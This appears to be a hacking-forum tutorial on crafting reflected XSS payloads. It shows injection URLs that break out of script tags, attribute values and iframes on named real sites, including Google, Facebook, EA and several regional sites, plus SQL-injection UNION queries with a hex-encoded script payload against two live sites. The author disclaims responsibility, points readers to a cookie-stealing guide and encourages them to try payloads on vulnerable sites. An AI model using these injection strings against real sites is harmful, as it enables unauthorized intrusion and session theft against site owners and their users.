XSS

XSS
[Behind the mask]

What is XSS?

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications that enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites accounted for roughly 80.5% of all security vulnerabilities documented by Symantec as of 2007.[1] Their effect may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner.<exlanation from Wikipedia>

Let’s XSS

XSS is not just pasting XSS attack vectors in search boxes , and address bars , you have to know where that input is going , how is it being parsed , etc... If you wanna learn how to find XSS holes on pages first you need to have atleast basic knowledge of HTML , Javascript and a little bit of PHP . So in this paper I will go over some XSS vulnerable websites from XSSed.com , and we will be reviewing source code of those vuln web sites. My main goal is to show you how to properly build your XSS attack vector.

I will not:
1. Show you how to steal cookies
2.Take responsibility for your action after you read this paper.

Our first site will be:
1 .

Code:

http://www.un.lk/media_centre/press_releases.php?id=#

Lets try and change the # to something else , for example. id=XSSTest and we see that no error is shown so we can assume that webpage has accepted our input , lets see where in the source is our XSSTest string located.

Source of [http://www.un.lk/media_centre/press_releases.php?id=XSSTest ] :

Spoiler (Click to View)

Great in both examples we are already inside JavaScript

But this doesn’t proves anything , lets see will <> be parsed so next we go:
[www.un.lk/media_centre/press_releases.php?id=<script>]

Source of [www.un.lk/media_centre/press_releases.php?id=<script>] : 

Spoiler (Click to Hide)

Great our input is not being parsed , if it were we would have &lt;script&gt;
instead of <script> .

I will show you 2 options how to exploit it :

1. jshow(<script>) in here you can see we are already inside the javascript so we can just do

Code:

www.un.lk/media_centre/press_releases.php?id=alert(0)

and our alertbox will be executed. Why , you ask? Look at the source code :

Spoiler (Click to Hide)

Our alertbox is taken as valid input and processed by our browser and there you have alertbox.[ onload= ] is Jscript event that triggers when page is loaded , so when you call it onload="Here is where javascript is located" , everything inside onload event will be processed as valid input , and so is our alert(0).

2.Every element on webpage has it’s openning [ < ] and closing [ > ] tag.
);jshow(<script>);"> as you can see closing is done with );"> so it goes like this alert(0) );"> , so for our XSS to work we must close the body tag and start a new <script> tag.So in this case we use :

Code:

www.un.lk/media_centre/press_releases.php?id=);"><script>alert(0)</script>

Source code :

Spoiler (Click to Hide)

You see we closed the body tag and started the new <script> tag , and cos it’s valid it is executed.

Also another way is :

<script language="javascript" type="text/javascript" defer="defer">

news_toggle_visibility(<script>);

</script>

to escape the tag we use );</script><script>alert(0)</script> (we closed the existing <script> with );</script> and started new one <script>alert(0)</script> )

The url is :

Code:

http://www.un.lk/media_centre/press_releases.php?id=);</script><script>alert(0)</script>

Source:

Spoiler (Click to Hide)

or we can do this :

Code:

http://www.un.lk/media_centre/press_releases.php?id=);</script><script>alert(0)</script><script>alert(12

In solution before we saw there is ); left after our injected XSS vector so here is the source:

Spoiler (Click to Hide)

We just added <script>alert(12 vector and );</script> just closed our injected script tag.

Code:

http://www.chip.de/ii/grossbild_v2.html?sales=2122

Time to review the code , after searching for value 2122 inside the source code we get :

Spoiler (Click to Hide)

As you can see like in our first example we are already inside <script> tag , but in this case we have to close the value and input new Jscript code , in our case we have"2122"; so first part of our XSS vector will be "; . So lets try "; alert(0);

Code:

http://www.chip.de/ii/grossbild_v2.html?sales="; alert(0);

Source :

Spoiler (Click to Hide)

As you can see we are inside the script but no alertbox is shown , but why is that , it’s because of "; after our XSS attack vector , and as you can see every value that is assigned to variable has opening " and closing " and in our case we have closed somtr.prop48=" value with "; but there is "; left unclosed. You can see the problem first value is closed but what is with third " , we have to close it too , so our XSS link will be :

Code:

http://www.chip.de/ii/grossbild_v2.html?sales="; alert(0); MaXoNe="XSS

So lets see the source :

Spoiler (Click to Hide)

As you can see we closed the third " and our alertbox is shown , so the rule is try to close either every tag or every value with your XSS attack vector...You will have less errors on the page you are XSSing and your XSS vector will look cooler .

Code:

http://www.bhtelecom.ba/korisnicki_portal.html?&no_cache=1 [POST][Self XSS]

Self XSS is XSS attack that is trigered when user enters payload inside the vulnerable input box , it takes SE for this type of XSS.Unlike for GET method when we can see our XSS payload inside the link bar in our browser , POST method wont show you what is webpage sending to server , so we have to use tools to see what POST values we are sending to server , we can use :

1. Live HTTP headers [http://www.youtube.com/watch?v=bz7KGhraX-0 ]
2. BurpSuite Proxy [lookup Hooded Robin’s tut on that]

Here we have two input boxes , one says "Login ili mobitel" and the other "Lozinka" , so lets input something inside those two input boxes and press OK button.
Lets input Text"<>/\ in "Login ili mobitel" field and Text2"<>/\ in "Lozinka" field. We get an error but lets see where did our input go , so here is the source :

Spoiler (Click to Hide)

[spoiler]

We see that our input did some changes to source code , first value from login input box , closed the source value :

src="https://portal.bih.net.ba/amserver/UI/Login?Login.Token1=Text\"<>/\\

And we can see that our input is not being encoded , so lets now try this:

First input box : TestXSS
Second input : "></iframe></div><script>alert(0)</script>

And when we press OK button , we get alert box , lets see why is that :

[spoiler]

What happened:

"> ----that closed src value in opened iframe tag :

<iframe src="https://portal.bih.net.ba/amserver/UI/Login?Login.Token1=sss&Login.Token2=\">

</iframe> ---- closed iframe tag :

<iframe src="https://portal.bih.net.ba/amserver/UI/Login?Login.Token1=sss&Login.Token2=\"></iframe>

<script>alert(0)</script> --- new script tag with alertbox

and thats it , we escaped the iframe tag with "></iframe> and added new script tag <script>alert(0)</script>.To hide any errors use either

1. "></iframe></div><script>alert(0)</script><!— (coments out the rest of code)
2. "></iframe></div><script>alert(0)</script><iframe> (figure it out )

And now , maybe you think that XSS attacks can’t make any damage but big companies like Google and Facebook have a reward program for XSS findings on their sites , cos XSS attacks can be used to steal users cookies [http://jehiah.cz/a/xss-stealing-cookies-101 ]] and when you consider that big companies have millions of users , vulnerability like XSS can have devastating effect.
Se lets analyze Google XSS vulnerability which was found by ElvinGuitar, user from HackForums.net :

Vuln. link :

Code:

https://www.google.com/voice/rates?p=

Lets try :

Code:

https://www.google.com/voice/rates?p=XSSTest

We get the same page so out input is accepted , and now lets review the code :

Spoiler (Click to Hide)

Here is our input lets evaluate how we can exploit it , so first we notice we are inside the script , and we have '); as our first part of XSS attack vector , so lets do this

Code:

https://www.google.com/voice/rates?p='); alert(0);</script>

So this is the result:

<script>
var callingRatesPage = new _callingRatesPage(
'en',
'USD','';); alert(0);</script>');
callingRatesPage.render(document.getElementById('calling-rates-page'));
</script>

We closed the value with '); and added our alert event alert(0); and we close the script tag with </script> and we get our alert box.

Seems easy doesn’t it , well ElvinGuitar got 1000$ for that XSS .

And now facebook :

Code:

http://www.facebook.com/ads/create/photos/creative_uploader.php?controller_id=c4c288b438ed080&path=whatever&src=whatever&vol=90&w=60&h=80&post_upload=1

So here is one advice , try searching the values from the url inside the source code , so in this case we would search the c4c288b438ed080 value and this is what we get , also you should search every value after the = in Url , and see where it’s located , so here is the source code :

<script>
...
onloadRegister(function (){window.parent.__UIControllerRegistry["c4c288b438ed080"].saveUploadedImage("whatever", "whatever", 90, 60, 80);});
...
</script>

Nice , so lets replace c4c288b438ed080 with Test<>"\/ an we get this :

Code:

http://www.facebook.com/ads/create/photos/creative_uploader.php?controller_id= Test<>\/&path=whatever&src=whatever&vol=90&w=60&h=80&post_upload=1

And the source code :

<script>
...
onloadRegister(function (){window.parent.__UIControllerRegistry["Test<>\/ "].saveUploadedImage("whatever", "whatever", 90, 60, 80);});
...
</script>

Great , our input is not being encoded , so we see we are inside the {[ ]}; brackets , so we have to close that value with MaXoNe″]}; alert(0); // and so the url will be :

Code:

http://www.facebook.com/ads/create/photos/creative_uploader.php?controller_id=MaXoNe″]}; alert(0); // &path=whatever&src=whatever&vol=90&w=60&h=80&post_upload=1

And source code:

<script>
...
onloadRegister(function (){window.parent.__UIControllerRegistry["MaXoNe"]};alert(0); //"].saveUploadedImage(„whatever“, „whatever“, 90, 60, 80);});
...
</script>

What happened , well ″]}; closed the value and alert(0); triggered our alerbox and // is used to coment out the rest of the code all the way to the </script>.

We could use this too :

Code:

http://www.facebook.com/ads/create/photos/creative_uploader.php?controller_id=MaXoNe″]}; alert(0); </script><!--&path=whatever&src=whatever&vol=90&w=60&h=80&post_upload=1

The difference is that we closed the script tag and commented the rest of the code , like this :

<script>
...
onloadRegister(function (){window.parent.__UIControllerRegistry[″MaXoNe″]};alert(0); </script><!—″].saveUploadedImage(″whatever″, ″whatever″, 90, 60, 80);});
...
</script>

The green code is commented out because of the <!-- .

And this one I found on ea games site :

Code:

http://www.ea.com/search?q=

So lets try :

Code:

http://www.ea.com/search?q=Test<>/\″

And lets see what we got :

Spoiler (Click to Hide)

We see that <> is filtered(deleted) but ″ is not being encoded , now we know that we can escape the value of title=″ ″ so first part of our XSS payload is ″ and what can we do next , lets see , first we can’t use < > so no script , img , body or any other tag , but we are inside the <h1> tag which is the heading value , and there are Jscript events that can be used by almost every HTML element , like :

onmouseover= activates JScript code when user moves mouse over HTML tag to who event belongs.

onclick= activates JScript code when user clicks on HTML tag to who event belongs.

ondblclick= activates JScript code when user dblclicks on HTML tag to who event belongs.

onmouseout= activates JScript code when cursor leaves the are off HTML tag to who event belongs.

So we can do this :

Code:

http://www.ea.com/search?q="onclick="alert('MaXoNe');""

Code :

Spoiler (Click to View)

With " we escaped the value , and added onclick=alert("MaX"); event and with next " we closed the value that was left behind , or we can use " onclick=alert("MaX"); //.
With // we comment out the rest of code all the way to > . So when we click the heading we get alertbox .

SQLi and XSS

URL from zerofreak’s SQLi tutorial on HF.

Code:

http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11--

There are vuln. columns shown on the page , we will select column 8 , so lets see the source :

Spoiler (Click to Hide)

We will use :

Code:

http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,'</font><script>alert(/maxone/)</script><font>',9,10,11—

Look at the source and figure it out , it’s time for you to do something.

Or if magic_quotes is enable we can bypass it by hexing our value :

Code:

http://www.armorysquareofsyracuse.com/main/shopping.php?id=179  and false union /*!select*/ 1,2,0x3c2f7469746c653e3c7363726970743e616c6572742830293c2f7363726970743e,4,5,6,7​,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--

Where 3c2f7469746c653e3c7363726970743e616c6572742830293c2f7363726970743e is </title><script>alert(0)</script>.
Again review the source to find out why did I used this payload.

Thats all from me , my advice go on XSSed.com , and look at mirrors , search the code ,try different XSS payloads, be creative.
Also if you want to be good XSSer master HTML and Jscript , there is no other way.
Knowledge is power.